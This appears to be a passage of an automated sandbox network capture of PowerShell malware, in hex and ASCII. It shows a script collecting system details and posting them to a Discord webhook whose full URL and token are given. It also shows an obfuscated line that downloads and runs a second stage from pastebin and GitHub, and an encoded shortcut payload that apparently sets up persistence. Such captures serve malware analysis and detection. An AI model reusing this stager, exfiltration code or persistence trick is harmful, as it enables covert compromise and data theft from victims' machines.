                                                                              2024-10-15 13:53:47 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                              Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                              2024-10-15 13:53:47 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                              Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.749873162.159.137.2324437612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:53:48 UTC333OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Content-Type: application/json
                                                                              Host: discord.com
                                                                              Content-Length: 299
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:53:48 UTC25INHTTP/1.1 100 Continue
                                                                              2024-10-15 13:53:48 UTC299OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4d 53 44 37 32 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** MSD72\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                              2024-10-15 13:53:48 UTC1369INHTTP/1.1 204 No Content
                                                                              Date: Tue, 15 Oct 2024 13:53:48 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              set-cookie: __dcfduid=e736915a8afc11ef8c235ac280988193; Expires=Sun, 14-Oct-2029 13:53:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                              x-ratelimit-limit: 5
                                                                              x-ratelimit-remaining: 4
                                                                              x-ratelimit-reset: 1729000430
                                                                              x-ratelimit-reset-after: 1
                                                                              via: 1.1 google
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2PB6K1fdHI4y%2FP4yJYEjOmrQUuczk4geTRZfKHYH9HYLM60CiicORfozMRZPw5JxD4kHWIHIPP3e5B8U%2FXZfw0n8R1IrZUuyZrI0LrZaWzejlvnJSNHm1UgcAAaz"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                              Set-Cookie: __sdcfduid=e736915a8afc11ef8c235ac2809881935cc550b93a11f9b57fb17c7445598c66faab69d69f36d3d874fe9ac719231aec; Expires=Sun, 14-Oct-2029 13:53:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              Set-Cookie: __cfruid=e2a351823e0fb5f638e993a75946143f0d94d602-1729000428; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                              Set-Cookie: _cfuv
                                                                              2024-10-15 13:53:48 UTC194INData Raw: 69 64 3d 56 36 6d 42 43 67 55 34 64 31 48 2e 47 75 77 54 61 63 49 4e 59 6a 43 39 36 5f 48 5a 4a 35 78 47 57 79 68 41 56 50 47 41 72 6d 67 2d 31 37 32 39 30 30 30 34 32 38 37 38 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 63 32 36 32 61 37 38 33 34 37 36 2d 44 46 57 0d 0a 0d 0a
                                                                              Data Ascii: id=V6mBCgU4d1H.GuwTacINYjC96_HZJ5xGWyhAVPGArmg-1729000428785-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304c262a783476-DFW


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.749900104.20.4.235443336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:53:53 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: pastebin.com
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:53:53 UTC396INHTTP/1.1 200 OK
                                                                              Date: Tue, 15 Oct 2024 13:53:53 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              x-frame-options: DENY
                                                                              x-content-type-options: nosniff
                                                                              x-xss-protection: 1;mode=block
                                                                              cache-control: public, max-age=1801
                                                                              CF-Cache-Status: HIT
                                                                              Age: 83
                                                                              Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d304c42e88e477c-DFW
                                                                              2024-10-15 13:53:53 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                              Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                              2024-10-15 13:53:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.749910185.199.108.133443336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:53:54 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: raw.githubusercontent.com
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:53:54 UTC901INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 7508
                                                                              Cache-Control: max-age=300
                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: deny
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                              Accept-Ranges: bytes
                                                                              Date: Tue, 15 Oct 2024 13:53:54 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-dfw-kdfw8210092-DFW
                                                                              X-Cache: HIT
                                                                              X-Cache-Hits: 1
                                                                              X-Timer: S1729000435.507344,VS0,VE1
                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              X-Fastly-Request-ID: c8b639bb793da711f33b2ab112bc7c7c3f90f9bf
                                                                              Expires: Tue, 15 Oct 2024 13:58:54 GMT
                                                                              Source-Age: 82
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                              Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                              Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                              Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                              Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                              2024-10-15 13:53:54 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                              Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                              2024-10-15 13:53:54 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                              Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.749947162.159.137.2324437412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:54:01 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Content-Type: application/json
                                                                              Host: discord.com
                                                                              Content-Length: 299
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:54:01 UTC299OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4d 53 44 37 32 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** MSD72\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                              2024-10-15 13:54:01 UTC1358INHTTP/1.1 204 No Content
                                                                              Date: Tue, 15 Oct 2024 13:54:01 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              set-cookie: __dcfduid=eef2d2e68afc11ef8f4d5630eabc2bdf; Expires=Sun, 14-Oct-2029 13:54:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                              x-ratelimit-limit: 5
                                                                              x-ratelimit-remaining: 4
                                                                              x-ratelimit-reset: 1729000443
                                                                              x-ratelimit-reset-after: 1
                                                                              via: 1.1 google
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=54iauL%2BiqaP%2FyJDZ4KlgxaNZldi%2FUjY3n4o3dD9xsbtQMy9PGFf8FafWCVWOrHmNvQOdA4i43%2Fbk8gWHoC9MRjQj2eLhwoMo1MpCLvcEmOg71SY7uOGsLgnHv%2Bym"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                              Set-Cookie: __sdcfduid=eef2d2e68afc11ef8f4d5630eabc2bdf58eea19087b19488e18bf0ab7d31e7c1cc032605b7f20ad999591227f70e2b1f; Expires=Sun, 14-Oct-2029 13:54:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              Set-Cookie: __cfruid=77634d5c2862d917078bd131e605110c596f68ac-1729000441; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                              2024-10-15 13:54:01 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 50 62 44 39 73 41 6b 48 6c 61 45 71 55 67 38 70 41 4e 30 64 78 44 62 73 52 4d 49 70 77 57 77 6e 59 5f 4c 4c 6c 36 54 57 42 73 59 2d 31 37 32 39 30 30 30 34 34 31 37 32 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 63 37 37 39 63 39 38 34 36 35 63 2d 44 46 57 0d 0a 0d 0a
                                                                              Data Ascii: Set-Cookie: _cfuvid=PbD9sAkHlaEqUg8pAN0dxDbsRMIpwWwnY_LLl6TWBsY-1729000441727-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304c779c98465c-DFW


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.749979162.159.137.232443336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-15 13:54:07 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Content-Type: application/json
                                                                              Host: discord.com
                                                                              Content-Length: 299
                                                                              Connection: Keep-Alive
                                                                              2024-10-15 13:54:07 UTC299OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4d 53 44 37 32 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** MSD72\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
